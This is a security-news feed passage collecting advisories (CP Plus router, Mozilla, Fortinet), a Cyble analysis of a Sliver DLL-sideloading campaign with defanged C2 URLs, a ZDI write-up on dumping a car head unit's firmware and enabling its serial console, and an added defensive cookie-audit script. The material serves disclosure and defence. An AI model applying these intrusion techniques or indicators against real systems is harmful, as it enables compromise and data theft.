The CP Plus router vulnerability stems from a security misconfiguration in its web interface. Specifically, it involves insecure handling of cookie flags, which could allow an attacker to hijack an HTTP session. This flaw could be exploited by a remote attacker who intercepts data transmissions during an HTTP session. The attacker could then potentially access sensitive information, compromise the targeted device, and escalate the attack to manipulate the router's settings or steal confidential data. The issue is linked to a sensitive cookie in an HTTPS session that lacks the "Secure" attribute, a problem that falls under the Common Weakness Enumeration (CWE-614). This misconfiguration exposes the router to risks like Session Hijacking or Man-in-the-Middle (MITM) attacks, where attackers intercept and alter communications between the user and the system.

Impact and Risk Assessment
The vulnerability in CP Plus Router has the potential to severely impact the confidentiality, integrity, and availability of the targeted device. Should an attacker successfully exploit the vulnerability, they could gain unauthorized access to critical data stored within the router, such as user credentials, network configurations, and other sensitive network-related information. Furthermore, an attacker could alter these settings to disrupt the router's operations or even gain control over connected devices. Since the CP Plus CP-XR-DE21-S Router is commonly used in both home and small-office environments, the implications of this vulnerability are far-reaching. Unauthorized access could lead to the theft of personal or corporate data, loss of service, and extensive damage to the security of the network.

Discovery and Acknowledgment
This critical vulnerability was reported by security researchers Shravan Singh and Karan Patel. Their research revealed the insecure handling of cookie flags, which ultimately exposed the router to the described security risks. The vulnerability has been assigned the identifier CVE-2025-0479 in the Common Vulnerabilities and Exposures (CVE) system. Despite the discovery, there is currently no public proof-of-concept (PoC) available, nor is there evidence of the vulnerability being actively exploited in the wild. However, this should not diminish the severity of the threat, and users of CP Plus Routers should take immediate steps to mitigate any potential risks until a patch is released.

Mitigation and Recommendations
As of the disclosure date, no official patch has been released to address the CP Plus Router vulnerability. Users and administrators of affected routers are advised to follow several key security practices to mitigate the risks associated with this vulnerability:
- Restrict access to the router's web interface to trusted networks only. This will reduce the chances of an external attacker exploiting the vulnerability.
- Employ a VPN or another secure method to connect remotely to the router's web interface, ensuring that the data transmission remains encrypted.
- Regularly check the router's logs for unusual activities or signs of exploitation.
- If the router's web interface is not essential for daily operations, consider disabling it altogether to eliminate one attack vector.
- Implement network segmentation to isolate the CP Plus Router from more critical systems within the network, limiting the potential damage in case of an exploit.
- Educate users about the risks of accessing the router's interface from untrusted networks, such as public Wi-Fi.

Conclusion
The CP Plus Router vulnerability highlights the critical need for proper security configurations, especially when handling sensitive data within network devices. Until a formal patch is made available, users must remain proactive in securing their devices, while the security community continues to monitor the situation closely. Any updates or patches from CP Plus will be essential in addressing this high-severity risk. As connected devices become increasingly integral to daily life, it is crucial for users of the CP Plus CP-XR-DE21-S Router to prioritize addressing this vulnerability and implementing appropriate mitigation measures to protect their systems.
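The CWE-614 condition described above (a session cookie issued over HTTPS without the Secure attribute) can be checked mechanically from a response's Set-Cookie headers, which is a useful audit step for any web-managed device. The block below is an added example, not code from the advisory, the researchers or CP Plus; the response headers and cookie names in it are constructed.

```python
"""Audit Set-Cookie headers for the CWE-614 misconfiguration (missing Secure)
plus the related HttpOnly and SameSite hardening attributes.

Added example; the sample response and cookie names are constructed and
are not taken from the CP Plus router.
"""
from dataclasses import dataclass, field


@dataclass
class Cookie:
    name: str
    value: str
    # Lower-cased attribute name -> attribute value, or True for bare flags.
    attrs: dict = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return Cookie(name.strip(), value, attrs)


def audit_cookie(cookie: Cookie, scheme: str) -> list[str]:
    """Return the weaknesses found for a cookie set over the given URL scheme."""
    findings = []
    if scheme == "https" and "secure" not in cookie.attrs:
        # CWE-614: without Secure the browser also sends this cookie over plain
        # HTTP, where an on-path attacker can read it and hijack the session.
        findings.append(f"{cookie.name}: missing Secure attribute (CWE-614)")
    if "httponly" not in cookie.attrs:
        # Without HttpOnly, script injected into the page can read the cookie.
        findings.append(f"{cookie.name}: missing HttpOnly attribute")
    if "samesite" not in cookie.attrs:
        # SameSite limits cross-site requests that carry the session cookie.
        findings.append(f"{cookie.name}: SameSite attribute missing")
    return findings


def audit_response(scheme: str, headers: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Audit every Set-Cookie header of a response; returns findings per cookie."""
    report = {}
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(value)
        findings = audit_cookie(cookie, scheme)
        if findings:
            report[cookie.name] = findings
    return report


# Constructed response headers: a weak session cookie beside a hardened one.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=3f9a1c; Path=/"),
    ("Set-Cookie", "csrftoken=91bd; Path=/; Secure; HttpOnly; SameSite=Strict"),
]

if __name__ == "__main__":
    # Only sessionid is reported; csrftoken carries all three attributes.
    for cookie_name, findings in audit_response("https", SAMPLE_HEADERS).items():
        for finding in findings:
            print(finding)
```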
by The Cyber Express
2025-01-21 09:26:38
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users
Overview
Mozilla products, including the popular Mozilla Firefox and Thunderbird, have been found to contain multiple vulnerabilities that could allow attackers to execute arbitrary code, cause system instability, and even gain escalated privileges. The severity of these issues is high, and they affect both desktop and mobile versions of Mozilla's browser and email client. The Indian Computer Emergency Response Team (CERT-In) reported these Mozilla vulnerabilities in an advisory published on January 20, 2025, with patches already available in recent updates. Users and organizations relying on Mozilla Firefox, Mozilla Thunderbird, and their extended support release (ESR) versions are advised to take immediate action to mitigate risks.
The Mozilla vulnerabilities are present in several versions of Mozilla Firefox and Thunderbird, specifically:
- Mozilla Firefox versions prior to 134
- Mozilla Firefox ESR versions prior to 128.6
- Mozilla Firefox ESR versions prior to 115.19
- Mozilla Thunderbird versions prior to 134
- Mozilla Thunderbird ESR versions prior to 128.6
- Mozilla Thunderbird ESR versions prior to 115.19
The issues are critical for both individual users and enterprises using these open-source applications for browsing and communication. Users should ensure they have the latest updates installed to avoid potential exploits.

Overview of the Mozilla Vulnerabilities
A range of vulnerabilities has been identified in Mozilla Firefox and Thunderbird, with the potential to allow attackers to perform actions such as remote code execution (RCE), denial of service (DoS) attacks, bypassing security restrictions, or even spoofing system elements. Mozilla has provided security patches in versions 134 for Firefox and Thunderbird, as well as in the ESR releases 128.6 and 115.19. These issues are significant because they provide opportunities for remote attackers to exploit weaknesses in the software without needing to interact directly with the targeted system. Vulnerabilities in Mozilla Firefox and Thunderbird have been classified with high and moderate severity levels, as attackers could gain unauthorized access to sensitive information, execute arbitrary code, or disrupt normal system operations. The full exploitation of these vulnerabilities may result in system instability or a complete compromise of the affected device.

Key Vulnerabilities
Several vulnerabilities have been identified and addressed across Mozilla Firefox and Thunderbird. Below are some of the notable issues that have been fixed in the latest updates:
CVE-2025-0244: Address Bar Spoofing in Firefox for Android
Impact: High
Description: This vulnerability allowed an attacker to spoof the address bar in Firefox for Android when redirecting to an invalid protocol scheme. This could mislead users into believing they were on a legitimate site, facilitating phishing and other malicious activities.
Note: This issue only affected Android operating systems.
CVE-2025-0245: Lock Screen Setting Bypass in Firefox Focus for Android
Impact: Moderate
Description: A flaw in Firefox Focus allowed attackers to bypass user authentication settings for the lock screen, potentially giving unauthorized individuals access to the application.
CVE-2025-0237: WebChannel API Vulnerability
Impact: Moderate
Description: The WebChannel API, used for communication across processes in Firefox and Thunderbird, did not properly validate the sender's principal. This could lead to privilege escalation attacks, allowing attackers to perform actions with higher privileges than intended.
CVE-2025-0239: Memory Corruption via JavaScript Text Segmentation
Impact: Moderate
Description: A flaw in how Firefox and Thunderbird handled JavaScript text segmentation could cause memory corruption, which might lead to crashes or, in some cases, the execution of arbitrary code.
CVE-2025-0242: Memory Safety Bugs
Impact: High
Description: Several memory safety bugs were discovered in both Firefox and Thunderbird that showed signs of memory corruption. If exploited, these bugs could allow remote attackers to execute arbitrary code, compromising system security.
Fixed in: Firefox 134, Thunderbird 134, Firefox ESR 115.19, Firefox ESR 128.6, Thunderbird 115.19, Thunderbird 128.6
These vulnerabilities in Mozilla products are part of a broader set of security flaws that the Mozilla team has identified and addressed. The vulnerabilities affect multiple platforms, including desktop and mobile versions, and may result in severe security breaches if not patched.

Recommendations for Users
Given the potential impact of these Mozilla vulnerabilities, it is crucial for all users to update their systems to the latest versions of Mozilla Firefox or Thunderbird. The updates, which are available for both standard and ESR releases, fix critical security flaws and improve overall system stability. Additionally, users are advised to consider the following precautions:
- Ensure that Mozilla Firefox and Thunderbird are updated to versions 134 or higher, or to the appropriate ESR releases (128.6 or 115.19).
- Keep an eye on system behavior for signs of malicious exploitation, such as unexpected crashes or unauthorized access.
- For those using Mozilla Firefox or Thunderbird in a business environment, enable multifactor authentication and other security features to limit exposure to attacks.
Without the proper patches, attackers can exploit Mozilla Firefox vulnerabilities to gain access to sensitive data, compromise user systems, and cause severe disruptions. Memory corruption issues, such as those reported in CVE-2025-0242, could lead to remote code execution, allowing attackers to hijack user systems or deploy malware. Furthermore, flaws like CVE-2025-0244 could facilitate phishing campaigns by spoofing URLs in the address bar, tricking users into visiting malicious websites.

Conclusion
Mozilla has released important security fixes for vulnerabilities in Mozilla Firefox and Mozilla Thunderbird that affect a wide range of users. These vulnerabilities, which could lead to arbitrary code execution, denial of service, or privilege escalation, are present in older versions of the software. Users are strongly advised to upgrade to the latest versions to protect against potential exploitation. Additionally, by applying recommended mitigations and staying informed about the latest security updates, users can better protect their systems from cyber threats.
To protect online systems against these vulnerabilities, Cyble, an award-winning cybersecurity firm, offers advanced, AI-powered cybersecurity solutions. With platforms like Cyble Vision, businesses can leverage real-time threat detection and actionable insights to mitigate risks from these vulnerabilities, including Mozilla vulnerabilities. Cyble's comprehensive suite of tools, including vulnerability management, dark web monitoring, and brand intelligence, helps organizations proactively address security gaps. By integrating Cyble's threat intelligence, companies can enhance their defenses and better protect against cyberattacks. For more information on how Cyble can help protect your systems, schedule a personalized demo and see how AI-driven solutions can strengthen your cybersecurity strategy.

References
https://www.cert-in.org.in/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-03/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-02/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-01/
The post Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users appeared first on Cyble.
by CYBLE
2025-01-21 09:19:00
HPE probes hacker claim involving trove of sensitive company data
The vendor said it has no immediate evidence of operational impacts or compromised customer data.
by Cybersecurity Dive
2025-01-21 08:58:30
Finding and Exploiting XSS in Web Applications (Step-by-Step)
Awesome blog! Thanks for sharing this valuable information
by HACKLIDO
2025-01-21 08:57:58
Experts found multiple flaws in Mercedes-Benz infotainment system
Kaspersky researchers shared details about multiple vulnerabilities impacting the Mercedes-Benz MBUX infotainment system. Kaspersky published research findings on the first-generation Mercedes-Benz User Experience (MBUX) infotainment system, specifically focusing on the Mercedes-Benz Head Unit. The researchers started from the results of another study conducted by KeenLab on the MBUX internals. The experts used a diagnostic software […]
by Security Affairs
2025-01-21 08:43:00
Treasury Department issues sanctions linked to cyber intrusions, telecom attacks
The Office of Foreign Assets Control took measures against a state-linked hacker and a Shanghai-based cybersecurity firm in response to the recent attacks against critical infrastructure in the U.S.
by Cybersecurity Dive
2025-01-21 08:26:40
New Cyber Threat Exposed: Advanced Techniques Used to Target German Systems
A new cyberattack targeting German entities has recently been uncovered by Cyble Research and Intelligence Labs (CRIL). This attack leverages sophisticated techniques such as DLL Sideloading, DLL Proxying, and the Sliver implant to compromise systems. The attack uses these advanced methods to evade detection and establish a persistent foothold within the victim's network.
The ongoing campaign, first detected by CRIL, employs a highly deceptive approach to infiltrate systems. It starts with a phishing email that contains an archive file. When opened, the archive, which appears to be harmless, contains several components designed to exploit the victim's system. One of the most notable files is a shortcut (.LNK) file, which, when executed, opens a seemingly innocuous document titled "Homeoffice-Vereinbarung-2025.pdf" — a decoy remote work agreement. However, the real damage occurs in the background.
Upon execution of the LNK file, the system runs a legitimate executable, wksprt.exe, which resides in the C:\Windows\System32 directory. This executable performs DLL Sideloading, a technique that loads a malicious DLL file — IPHLPAPI.dll — into the system. Interestingly, this malicious DLL is designed to mimic a legitimate system file, increasing its chances of bypassing security measures. The malicious DLL uses DLL Proxying to intercept function calls made by the executable and forward them to another legitimate DLL. This proxying technique allows the malicious DLL to remain undetected while executing harmful shellcode in the background. The shellcode, once executed, decrypts and runs the final payload: a Sliver implant, a popular open-source framework used for command-and-control operations in adversary emulation and Red Team exercises.
DLL Sideloading and DLL Proxying: The Infection Process
Infection Chain (Source: Cyble)
The attack starts when the victim extracts the archive file, which contains several files with names such as IPHLPAPI.dll, ccache.dat, and Homeoffice-Vereinbarung-2025.pdf.lnk. The files appear harmless at first glance, with the PDF document serving as the primary lure. However, once the LNK file is executed, it triggers a sequence of commands that copy wksprt.exe and other malicious files into specific system directories, including the hidden InteI folder under the %localappdata% path. To ensure persistence, the wksprt.lnk shortcut is placed in the system's Startup folder, making sure that the malware executes automatically when the system reboots. During this process, the malicious DLL file uses DLL Proxying to load another legitimate DLL, which then assists in reading the encrypted ccache.dat file containing the embedded shellcode.
Advanced Evasion Techniques
The DLL Sideloading and DLL Proxying techniques used in this attack are crucial for bypassing traditional detection mechanisms. The malicious IPHLPAPI.dll file is designed to look like a standard system file, making it harder for security tools to identify it as malicious. Additionally, by using DLL Proxying, the attackers can maintain the normal behavior of the infected application while running their malicious code in the background. Once the ccache.dat file is read and decrypted, it reveals the shellcode, which, in turn, runs another decryption process to retrieve the actual payload. This multi-layered decryption makes it even harder for security solutions to detect the attack until it has already caused damage. The final payload is the Sliver implant, which establishes a communication channel with the attacker's server, allowing them to execute further operations on the compromised system.
The Role of Sliver in the Attack
The Sliver implant, which is an open-source framework for Red Team operations, is used by the attackers to control the infected system. This framework allows for sophisticated remote control and monitoring of the compromised network. The implant can be used to execute a wide range of malicious activities, from stealing data to deploying additional malware. Once the Sliver implant is active, it connects to remote servers, specifically:
hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.html
hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.php
These remote endpoints are used by the attackers to further exploit the victim's system, facilitating the installation of additional malicious payloads or the exfiltration of sensitive data.
Potential Attribution
While the specifics of the attack are still under investigation, there are several indicators that suggest it could be the work of APT29, a well-known cyber threat group often associated with advanced persistent threats (APT). The use of DLL Sideloading, the deployment of Sliver, and the sophisticated nature of the attack are consistent with tactics previously observed in APT29 campaigns. However, the introduction of DLL Proxying is a new technique that hasn't been seen in their previous operations, making definitive attribution challenging.
Implications for German Entities
The attack specifically targets organizations in Germany, as evidenced by the German-language lure document and the fact that the initial archive file was uploaded to VirusTotal from a location in Germany. The lure document, which masquerades as a Home Office Agreement, appears to be designed to exploit the growing trend of remote work in Germany, making it highly relevant to the country's current workforce dynamics. This cyberattack highlights the growing complexity of modern threats, particularly those targeting businesses and organizations with high-value data or critical infrastructure.
Recommendations and Mitigations
To protect against attacks like this, organizations should consider implementing the following measures:
· Strengthen email filtering systems to identify and block phishing emails that may contain malicious attachments.
· Use whitelisting to prevent unauthorized execution of suspicious files, such as LNK files or unauthorized DLLs.
· Deploy EDR solutions to detect and block DLL Sideloading and shellcode injection activities.
· Monitor outbound network traffic for unusual activity, such as unexpected connections to Sliver endpoints or other suspicious servers.
· Educate employees about the dangers of phishing and the importance of exercising caution when opening email attachments or links from unknown senders.
Conclusion
The Sliver implant campaign targeting German organizations demonstrates the increasing sophistication of cyber threats. By employing techniques such as DLL Sideloading and DLL Proxying, the attackers are able to bypass traditional security measures and establish persistent access to compromised systems. This multi-stage attack highlights the need for enhanced detection and defense strategies to counter increasingly complex threats.
by The Cyber Express
2025-01-21 08:18:48
Threat Actor Claims Sale of 318 Million Otelier Records
A threat actor known as "Ay4me" has put up for sale a trove of 318 million records on BreachForums, claiming the data was stolen from Otelier, a cloud-based hotel management platform. The stolen database, totaling 7.8TB, reportedly contains sensitive information from major hotel chains such as Marriott, Hilton, and Hyatt. The data leak was disclosed … The post Threat Actor Claims Sale of 318 Million Otelier Records appeared first on CyberInsider.
by Cyber Insider
2025-01-21 05:00:00
Cosmos Series Part 4: Results-Oriented Critical Thinking
Explore how Bishop Fox integrates critical thinking into Cosmos development to enhance scalability, flexibility, and velocity. By focusing on outcomes and adopting structured analytical processes, we've avoided design pitfalls and empowered our teams to deliver impactful solutions.
by Bishop Fox
2025-01-21 05:00:00
Sneak Peek into Fetch the Flag CTF 2025
Fetch the Flag, Snyk's annual Capture the Flag (CTF) competition, is back for 2025. Join this exciting virtual event on February 27, 2025, hosted by Snyk and cybersecurity expert John Hammond, from 9 am to 9 pm ET.
by Snyk
2025-01-21 00:00:00
Leveraging CrowdStrike Falcon Against Attacks Targeting Okta Environments
by CrowdStrike
2025-01-21 00:00:00
Cleo MFT: CVE-2024-50623
Learn about CVE-2024-50623 affecting Cleo MFT products. Patch now to prevent RCE attacks and secure your systems.
by Recorded Future
2025-01-21 00:00:00
Annual Payment Fraud Intelligence Report: 2024
Explore 2024 payment fraud trends with Recorded Future: e-skimming, scam e-commerce, dark web insights, and 2025 predictions.
by Recorded Future
2025-01-20 23:59:00
Last Week in Security (LWiS) - 2025-01-20
Windows LPE (@MrAle_98), CLR OPSEC (@passthehashbrwn), WinRM BOFs (@falconforceteam), Bitlocker bypass (@Neodyme), BloodHound CLI (@cmaddalena), and more!
by Bad Sector Labs
2025-01-20 22:46:25
HPE is investigating IntelBroker's claims of the company hack
HPE is probing claims by the threat actor IntelBroker who is offering to sell alleged stolen source code and data from the company. Last week, the notorious threat actor IntelBroker announced on a popular cybercrime forum the sale of data allegedly stolen from HPE. IntelBroker, known for leaking data from major organizations, made the headlines […]
by Security Affairs
2025-01-20 20:38:00
Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and Routers
New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. "Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor
by The Hacker News
2025-01-20 20:35:17
Experts found new DoNot Team APT group's Android malware
Researchers linked the threat actor DoNot Team to a new Android malware that was employed in highly targeted cyber attacks. CYFIRMA researchers linked a recently discovered Android malware to the Indian APT group known as DoNot Team. The DoNot Team (aka APT-C-35 and Origami Elephant) has been active since 2016 and focuses on government and military organizations, […]
by Security Affairs
2025-01-20 20:23:00
DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection
The threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the
by The Hacker News
2025-01-20 18:16:08
Belsen Group Leaks 15,000+ FortiGate Firewall Configurations
FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…
by Hackread
2025-01-20 17:32:00
⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]
As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with
by The Hacker News
2025-01-20 17:04:13
Name That Toon: Incentives
Feeling creative? Have something to say about cybersecurity? Submit your caption and our panel of experts will reward the winner with a $25 gift card.
by Dark Reading
2025-01-20 16:53:32
🐝 Hive Five 207 - Brain Rot and One Man Armies
Editing with LLMs, 80% faster Ax framework, AI-first Director of Finance, Obsidian 2024 Gems of the Year Voting, 8 Lessons from Red Teaming 100 Gen AI Products, The Big Ass Data Broker Opt-Out List, and more...
by Hive Five
2025-01-20 16:40:00
Product Walkthrough: How Satori Secures Sensitive Data From Production to AI
Every week seems to bring news of another data breach, and it's no surprise why: securing sensitive data has become harder than ever. And it's not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting
by The Hacker News
2025-01-20 16:39:46
Malicious VPN Extensions Found Spying on Chrome Users
A new investigation by security researcher Wladimir Palant reveals that malicious VPN extensions on the Chrome Web Store are using obfuscation techniques to bypass Google's remote code execution restrictions. These extensions secretly collect browsing data, manipulate user traffic, and employ anti-debugging measures to evade detection.
Intrusive VPN extensions
Palant found that 32 VPN extensions rely … The post Malicious VPN Extensions Found Spying on Chrome Users appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:29:18
New AiTM PhaaS Platform 'Sneaky 2FA' Targets Microsoft 365 Accounts
A newly identified Adversary-in-the-Middle (AiTM) phishing kit, dubbed Sneaky 2FA, is being distributed as a Phishing-as-a-Service (PhaaS) operation on Telegram, enabling cybercriminals to bypass multi-factor authentication (MFA) protections for Microsoft 365 accounts. Sekoia's Threat Detection & Research (TDR) team discovered the phishing kit in December 2024 during routine threat-hunting activities and has since linked it … The post New AiTM PhaaS Platform 'Sneaky 2FA' Targets Microsoft 365 Accounts appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:20:07
Flaw in ChatGPT API Allows Powerful Reflective DDoS Attacks
A newly disclosed vulnerability in OpenAI's ChatGPT API allows attackers to trigger Distributed Denial-of-Service (DDoS) attacks against arbitrary websites using OpenAI's own infrastructure. The flaw enables an unauthenticated attacker to overwhelm a target website with HTTP requests originating from OpenAI's Microsoft Azure-hosted servers. OpenAI, a leading artificial intelligence research organization, operates ChatGPT, one of the … The post Flaw in ChatGPT API Allows Powerful Reflective DDoS Attacks appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:00:00
Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan
In this video, Kent Ickler and Jordan Drysdale discuss Attack Tactics 9: Shadow Credentials for Primaries, focusing on a specific technique used in penetration testing services at Black Hills Information Security. The post Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan appeared first on Black Hills Information Security.
by Black Hills Information Security
2025-01-20 16:00:00
Looking at the Attack Surfaces of the Pioneer DMH-WT7600NEX IVI
For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the single-DIN Pioneer DMH-WT7600NEX. This unit offers a variety of functionality, such as wired and wireless Android Auto and Apple CarPlay, USB media playback, and more. This blog post aims to detail some of the attack surfaces of the DMH-WT7600NEX unit as well as provide information on how to extract the software running on this unit for further vulnerability research.
Software Extraction
The initial effort to locate a serial console in the hope of easy software extraction bore no fruit. This left only a handful of options:
· Work with the software update package instead. However, the package was found to be encrypted, making this approach a dead end initially; more on that below.
· Attempt to desolder the eMMC chip and dump its contents using a programmer. This necessitates reballing and resoldering the eMMC chip, which is risky without proper SMD rework equipment.
· Attempt to extract eMMC contents in-system. This does not require any SMD rework, but the signal locations must be known, and the system must be powered and held in reset while dumping is in progress.
The researchers chose the last option. Connecting to the eMMC chip could be performed via (thankfully labeled) test points on the board. The missing MMC_CLK signal was probed for using an oscilloscope; here is where it was found after numerous attempts. In addition to that, the main SoC was held in reset by pulling the test point labelled RSTN to ground via a 220 Ohm resistor and a switch.
Note that when the SoC is held in reset, the 3.3V power line is cycled periodically by some other component, which powers off the eMMC chip. This is likely some watchdog component attempting to bring the system out of a hung state. Finding that component and persuading it not to do that was deemed too time consuming, and the 3.3V power rail was instead powered directly through a bench power supply.
Data at Rest
After the eMMC chip was successfully "backed up," it was time for Trend ZDI researchers to have a look at the 8 gigabytes of its contents. The image was found to sport a GPT partition table, with the following partitions defined after mounting the image via the loopback interface on a test system: There are two sets of bootable images, consisting of the header, boot, system, dtb, hirtos, bootloader, chips, and backup partitions. It is likely this is to safeguard against failed software updates, so there is a known good set of bootable images. Let's have a closer look at what is contained in each partition:
· The header partition contains what looks to be a description of other partitions in the set.
· The bootloader partition contains the bootloader as described, which seems to be a version of fastboot.
· The boot partition contains the Android/Linux kernel version 3.18.24.
· The dtb partition contains the DTB blob as described.
· The system partition contains the root file system.
· The hirtos partition contains a firmware image with ARM instructions. The exact purpose of this code is not currently known. The image consists of several chunks of code/data; some of it is obvious ARM code while others appear to be bitmap images. The following string was found inside the first chunk: "T-Monitor/triton_TCC897x Version 2.01.00" This suggests the code is to be executed on the main SoC but likely on a separate core.
· The chips partition contains the firmware for the GNSS daughter board.
· The backup partition contains some kind of binary data, rather sparsely organized.
Interestingly enough, the system itself appears to be a Linux-based one; none of the typical Android infrastructure could be located there. All the custom software is concentrated in /usr/local/ subdirectories.
Software Updates
Obtaining an image of the code running on the device allowed a second look at the software update format. The latest update file can be obtained from the manufacturer; unfortunately, they do not seem to list previous versions. This is justified, as downgrading the software is not officially supported anyway—as the team found out firsthand.
The software update package is structured like this:
· A header of 0x100 bytes describing the file, specifically the header size and the total size of the image, the software version in this update, plus which model the update is for.
· An RSA signature block of 0x100 bytes, which can be verified by a certain public key hardcoded in the software. The signature covers the described header only.
· An RSA signature block of 0x100 bytes, which can be decrypted by the same key, and which carries an AES-256 key instead of the digest.
· Update data, encrypted with AES-256-CBC using the all-zero IV. This decrypts into a gzipped "raw" update image.
The raw update image in turn consists of headers very similar to what can be found in the header partitions followed by a series of images for each partition mentioned in the headers. The image(s) can be processed further to extract the content of interest like the root file system.
Serial Console
Armed with some knowledge of the unit's software, it was time to revisit the search for the serial console.
By studying the contents of the bootloader partitions, Trend ZDI researchers discovered the bootloader may use values from the backup partitions to decide which values to pass via the `console` and `login` kernel parameters, among other things. Specifically, the sector at byte offset 0x800800 contains that data. The format which this data is in can be reverse engineered both from the bootloader and the NPSystemDebug class implementation. Notably, it appears that manipulation of these values could be performed via the UI as the code flow can be traced all the way to the `UI_UIEB_MM_99_018` class which implements two buttons changing the state of the values. However, at the moment of writing it was unknown how to reach that specific UI screen.
Thus, the direct manipulation of the flags was chosen instead. The contents of the backup partition were altered to enable both the serial console and the login prompt. After probing the board connectors for any semblance of serial data, it was discovered on CN3603 pin 7. Connecting a UART-to-USB dongle to that pin confirmed that indeed, console output is present, as well as the login prompt. Only three signals are routed to that connector; however, the RX signal was not immediately identified among those.
Studying the bottom layer of the board showed a single installed passive among several missing ones; this was one resistor pulling up a line otherwise not connected to any connector pin. Probing that line for being the missing RX line resulted in a success. Likely, one of the missing passives should connect that line to a connector pin. Now it was possible to communicate with the device—and log in locally. Having console access is always a big boon in vulnerability research.
Bluetooth
The vendor lists the following supported Bluetooth profiles:
· Advanced Audio Distribution Profile (A2DP)
· Hands-Free Profile
· Serial Port Profile
· Audio/Video Remote Control Profile (AVRCP) v1.6
Given the rich history of bugs in Bluetooth-related functionality, this could be an interesting attack vector.
Wi-Fi
The unit can be set up in both the client and access point modes for Wi-Fi. When in the AP mode, the unit allows using the WPS setup in addition to entering the PSK. This could potentially be an interesting attack angle as WPS flows were historically weak to attacks.
After connecting to the unit in AP mode and running a network scan, the following TCP ports were found to be open: 5000, 38000, 38001, 42000, 43000, and 60000. An Nmap script scan only showed that port 5000 uses TLS with a self-signed certificate; other services were not recognized. Using the console access, it is possible to map out the open ports to the corresponding processes (only ports allowed through the iptables are shown here for brevity): Given the abundance of what looks like non-standard services, Wi-Fi connectivity presents a potentially rewarding target for vulnerability research.
USB
The unit is equipped with a single USB-C port that provides the necessary interface for wired Android Auto and Apple CarPlay. The USB port also supports playback of audio files from a USB flash drive. The supported audio filetypes are:
· MP3
· WMA
· WAV
· AAC
· FLAC
· DSD
The unit also supports video playback with the following formats listed as supported:
· AVI
· MPEG
· DivX
· MP4
· 3GP
· MKV
· FLV
· WMV/ASF
· M4V
· H.263, H.264
In addition, it is also possible to view images in BMP, JPEG, and PNG formats. Parsing complex file formats is error-prone and has been a rich source of exploitable bugs since time immemorial.
Android Auto and Apple CarPlay
Both wired and wireless Android Auto and Apple CarPlay are supported without the need for a third-party application to be installed on the paired mobile phone. When using the wireless versions, the paired phone connects to the aforementioned Wi-Fi network to establish a high-bandwidth channel for data to be sent and received. When connecting using a USB cable, the Wi-Fi network isn't used by Android Auto or Apple CarPlay and can be disabled in Settings. As evidenced above, the `Media` process is likely responsible for handling both.
Pwn2Own Automotive 2024 didn't see any entries that leveraged Android Auto or Apple CarPlay functionality to compromise a head unit. We will have to wait and see if Pwn2Own Automotive 2025 does!
Summary
We hope that this blog post has provided enough information about the Pioneer DMH-WT7600NEX attack surface to guide vulnerability research. Not every attack surface has been mentioned, and we encourage researchers to investigate further. We are looking forward to Automotive Pwn2Own, again to be held in January 2025 at the Automotive World conference in Tokyo. We will see if IVI vendors have improved their product security. Don't wait until the last minute to ask questions or register! We hope to see you there.
You can find me on Mastodon at @InfoSecDJ, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-20 15:46:24
Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access Risk
Overview
Fortinet, a global leader in cybersecurity solutions, recently released a critical advisory addressing a significant vulnerability (CVE-2024-55591) in its FortiOS and FortiProxy products. This flaw, which has a CVSSv3 score of 9.6, is categorized as a critical authentication bypass vulnerability and is currently being exploited in the wild. Attackers leveraging this vulnerability can potentially gain super-admin privileges by exploiting weaknesses in the Node.js WebSocket module, making this a high-stakes issue for organizations relying on Fortinet's products. This blog provides a detailed overview of the vulnerability, affected versions, Indicators of Compromise (IOCs), mitigation strategies, and steps for administrators to protect their systems effectively.
The Vulnerability Explained
The CVE-2024-55591 vulnerability stems from an "Authentication Bypass Using an Alternate Path or Channel" issue (CWE-288). An attacker can craft malicious requests to the Node.js WebSocket module, bypass authentication, and gain unauthorized super-admin access. Once exploited, the attacker can perform a wide range of malicious activities, including:
· Creating administrative or local user accounts.
· Modifying firewall policies, addresses, or system settings.
